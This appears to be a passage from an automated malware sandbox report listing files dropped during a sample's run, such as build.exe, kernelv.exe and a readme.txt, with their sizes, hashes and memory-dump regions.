                        bb36a77a8b4e4f901872e8c425fb0305e3b53d7501f0329a84a5dfe1ac4b73a9d780e6cd9f1acbb5471bbbb2f7f86742243daa28b8e2865fd743473486b8ad61

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e1bct13t.n25.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\build.exe

                        Filesize

                        137KB

                        MD5

                        7605fb5c749eeea0b1b27fdaad78051c

                        SHA1

                        28388bf016af085bbcbacf8c516853942f6ec8d3

                        SHA256

                        466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

                        SHA512

                        1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

                      • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

                        Filesize

                        211KB

                        MD5

                        b6054dbe4ed853c2e35291f045a632ba

                        SHA1

                        1355fbe1ea1f6bb566921f04512f78590c4b0e41

                        SHA256

                        b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

                        SHA512

                        648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

                      • C:\Users\Admin\readme.txt

                        Filesize

                        780B

                        MD5

                        60d646f40556d78166ad8111d850fc51

                        SHA1

                        babaaf0762000dbf4b3f7a93beb35b6d9279d94d

                        SHA256

                        a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

                        SHA512

                        3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

                      • memory/1040-58-0x00000000051B0000-0x00000000051C2000-memory.dmp

                        Filesize

                        72KB

                      • memory/1040-62-0x0000000006320000-0x000000000684C000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/1040-59-0x00000000053A0000-0x0000000005562000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/1040-63-0x0000000006BC0000-0x0000000006C26000-memory.dmp

                        Filesize

                        408KB

                      • memory/1040-57-0x00000000008C0000-0x00000000008FC000-memory.dmp

                        Filesize

                        240KB

                      • memory/1040-64-0x0000000006DD0000-0x0000000006E62000-memory.dmp

                        Filesize

                        584KB

                      • memory/1040-127-0x0000000007860000-0x0000000007E06000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/2376-0-0x0000000140000000-0x0000000140027000-memory.dmp

                        Filesize

                        156KB

                      • memory/2376-61-0x0000000140000000-0x0000000140027000-memory.dmp

                        Filesize

                        156KB

                      • memory/3368-46-0x00000000003F0000-0x0000000000418000-memory.dmp

                        Filesize

                        160KB

                      • memory/3468-17-0x00007FFF92A50000-0x00007FFF93512000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3468-14-0x00007FFF92A50000-0x00007FFF93512000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3468-13-0x00007FFF92A50000-0x00007FFF93512000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3468-12-0x000002377F3D0000-0x000002377F3F2000-memory.dmp

                        Filesize

                        136KB

                      • memory/3468-3-0x00007FFF92A53000-0x00007FFF92A55000-memory.dmp

                        Filesize

                        8KB